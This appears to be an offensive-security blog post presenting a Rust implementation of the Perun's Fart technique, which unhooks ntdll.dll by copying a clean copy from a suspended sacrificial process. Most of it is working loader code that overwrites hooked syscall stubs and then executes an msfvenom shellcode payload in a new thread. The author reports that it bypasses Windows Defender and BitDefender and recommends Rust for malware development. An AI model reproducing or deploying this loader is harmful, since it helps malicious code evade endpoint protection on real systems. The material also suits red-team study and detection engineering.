I've recently continued to explore the capabilities of Rust, and I decided to take on a challenge: implement Perun's Fart in Rust. Though this is not a novel technique, its implementation in Rust brings a new capability to the offensive toolset.
If you're not familiar with Perun's Fart, the methodology goes like this:
Execute implant.exe -> CreateProcess (Suspended) -> steal unhooked ntdll.dll from suspended process -> overwrite hooked syscall table in the memory of implant.exe -> execute malicious code
This technique is powerful because it lets us unhook our implant without an overly large PE file like the byoDLL technique, and does not require access to the copy of ntdll on disk. This technique is fairly well documented in other languages, but without further ado lets look at the implementation in Rust.
Part Two: The Code
The code is fairly lengthy and can be found in its in entirety on my Github, but the main function is below for your easy reference. It should be fairly straight forward to associate the code below with the methodology outlines above.
fn main() {
let mut garbage = String::from("\0");
let mut attrsize: usize = Default::default();
let mut old_protect = PAGE_EXECUTE_READ;
let pDosHdr: * const IMAGE_DOS_HEADER;
let pNtHdr: *const IMAGE_NT_HEADERS64;
let pOptHdr: IMAGE_OPTIONAL_HEADER64;
unsafe{
let sacrificialProcess = b"cmd.exe\0";
let initProcess = b"C:\\Windows\\System32\0";
let mut pi:PROCESS_INFORMATION = mem::zeroed();
let mut si:STARTUPINFOEXA = mem::zeroed();
si.lpAttributeList = HeapAlloc(GetProcessHeap(), HEAP_GENERATE_EXCEPTIONS, attrsize) as LPPROC_THREAD_ATTRIBUTE_LIST;
si.StartupInfo.cb = mem::size_of::<STARTUPINFOA>() as u32;
InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &mut attrsize);
//create sacrificial process
CreateProcessA(
0 as *const u8,
sacrificialProcess.as_ptr() as *mut u8,
0 as * const SECURITY_ATTRIBUTES,
0 as * const SECURITY_ATTRIBUTES,
false as i32,
CREATE_NEW_CONSOLE | CREATE_SUSPENDED,
0 as *const c_void,
initProcess as *const u8,
&mut si.StartupInfo,
&mut pi
);
//get base addr of ntdll in memory
let pNtdllAddr = GetModuleBaseAddr("ntdll.dll");
//map ntdll
pDosHdr = pNtdllAddr as *mut IMAGE_DOS_HEADER;
pNtHdr = (pNtdllAddr as u64 + (*pDosHdr).e_lfanew as u64) as *mut IMAGE_NT_HEADERS64;
pOptHdr = (*pNtHdr).OptionalHeader;
//find first image section
let pCacheImgSectionHead = (pNtHdr as u64 + mem::size_of_val(&(*pNtHdr).Signature) as u64 +IMAGE_SIZEOF_FILE_HEADER as u64+(*pNtHdr).FileHeader.SizeOfOptionalHeader as u64) as * const IMAGE_SECTION_HEADER;
let target_section = [46, 116, 101, 120, 116, 0, 0, 0]; //.text
//find text section of ntdll in memory
let mut ntdll_addr = (pCacheImgSectionHead as u64 + (IMAGE_SIZEOF_SECTION_HEADER as u64)) as * const IMAGE_SECTION_HEADER;
for n in 0..((*pNtHdr).FileHeader.NumberOfSections as u64){
ntdll_addr = (pCacheImgSectionHead as u64 + (IMAGE_SIZEOF_SECTION_HEADER as u64 * n)) as * const IMAGE_SECTION_HEADER;
if (*ntdll_addr).Name == target_section{
break;
}
}
let ntdll_size = pOptHdr.SizeOfImage as usize;
//create cache
let pCache =
VirtualAlloc(
0 as *const c_void,
ntdll_size,
MEM_COMMIT,
PAGE_READWRITE);
//read sacrificial process ntdll.dll
let bytesRead = 0 as *mut usize;
ReadProcessMemory(
pi.hProcess,
pNtdllAddr as *mut c_void,
pCache,
ntdll_size,
bytesRead
);
println!("pCache: {:?}", pCache);
println!("pCache size: {:?}", ntdll_size);
stdin().read_line(&mut garbage).ok();
//kill sacrificial process
TerminateProcess(pi.hProcess, 0);
println!("\nRemove hooks?\n");
stdin().read_line(&mut garbage).ok();
//unhook ntdll.dll
Unhook(ntdll_addr as *mut c_void, pCache as *const c_void);
VirtualFree(pCache,0,MEM_RELEASE);
println!("Unhooking complete, run payload?");
stdin().read_line(&mut garbage).ok();
}
//msfvenom calc
let payload : [u8;276] = […snip…];
unsafe{
//println!("allocating payload mem");
//allocate payload mem
let payload_addr =
VirtualAlloc(
0 as *const c_void,
payload.len(),
MEM_COMMIT,
PAGE_READWRITE);
//println!("copying payload into mem");
//copy payload
std::ptr::copy(payload.as_ptr() as _, payload_addr, payload.len());
//println!("restoring payload mem permissions");
//change payload permissions
VirtualProtect(
(payload_addr) as *const c_void,
payload.len(),
PAGE_EXECUTE_READ,
&mut old_protect
);
//println!("creating thread");
let thread_fn = std::mem::transmute (payload_addr as *const u32);
//create thread
//thread_fn();
let thread =
CreateThread(
null_mut(),
0,
thread_fn,
null_mut(),
0,
null_mut());
WaitForSingleObject(thread, u32::MAX);
}
}
Part Three: Differences
In terms of programmatic logic, there are no significant differences between the Rust implementation and implementations of this method in C, C++, or C#. However, due to the tight type control that Rust places on variables, there are significantly more type conversions in the code above than I'm personally used to seeing.
Additionally, at the time of writing, the windows_sys API's ability to parse the PE headers is not as robust or as well documented as it is in other languages. For example, in the code above it was necessary to manually add the size of the signature block into the traversal:
Rust Code:
let pCacheImgSectionHead = (pNtHdr as u64 + mem::size_of_val(&(*pNtHdr).Signature) as u64 +IMAGE_SIZEOF_FILE_HEADER as u64+(*pNtHdr).FileHeader.SizeOfOptionalHeader as u64) as * const IMAGE_SECTION_HEADER;
It might be possible to re-type a variable using the IMAGE_SECTION_HEADER0 type in windows-sys API, but the limited documentation on this mechanic made the solution above more viable at the time of writing.
This issue, combined with my limited understanding of Rust's memory mechanics, made it difficult to implement the memory manipulations in the fluid manner that I initially expected.
For example, in the FindFirstSyscallFunction used to locate the first bytes of the syscall table we search for the bytes in the following manner:
for n in 0..(memSize-3) as u64{
if *((memAddr as u64 +n) as PSTR) == pattern1[0]{
if *((memAddr as u64 +n+1) as PSTR) == pattern1[1]{
if *((memAddr as u64 +n+2) as PSTR) == pattern1[2]{
offset = n;
break;
}
}
}
}
This clumsy approach was the only manner in which I was able to retain the types necessary to conduct an adequate byte comparison. There is definitely a more idiomatic approach to solving this problem, and I welcome you to implement a better solution.
Part Four: ???
[Intentionally left blank]
Part Five: Profit
Upon compiling and executing the code in our target environment, we're able to validate that our approach works as designed. Even better, we can use a standard msfvenom calc payload without any modifications inside of our executable and still bypass detection by Windows Defender and BitDefender in the lab environment.
Hooked NtCreateThread
Unhooked NtCreateThread
Payload execution:
Part Six: Conclusion
In this writeup, we saw an overview of a Rust implementation of the Perun's Fart unhooking technique. We were able to successfully unhook our copy of ntdll in memory and then go on to execute our payload thereby validating the stability of our approach.
We also saw how Rust requires a significantly more deliberate approach to variable types and memory manipulations than other languages, and some of the issues that this can cause for developers migrating to Rust.
Overall, the language is definitely viable for malware development and remains less detectable than similar C++ or C implementations of the same program. Personally, I will continue to explore the capabilities of Rust, but C and C++ will continue to be my primary development languages.
A special thanks to @0x4d5a for the help in developing the code discussed in this writeup. They have a solid set of offensive coding courses availible at: https://redteamsorcery.teachable.com/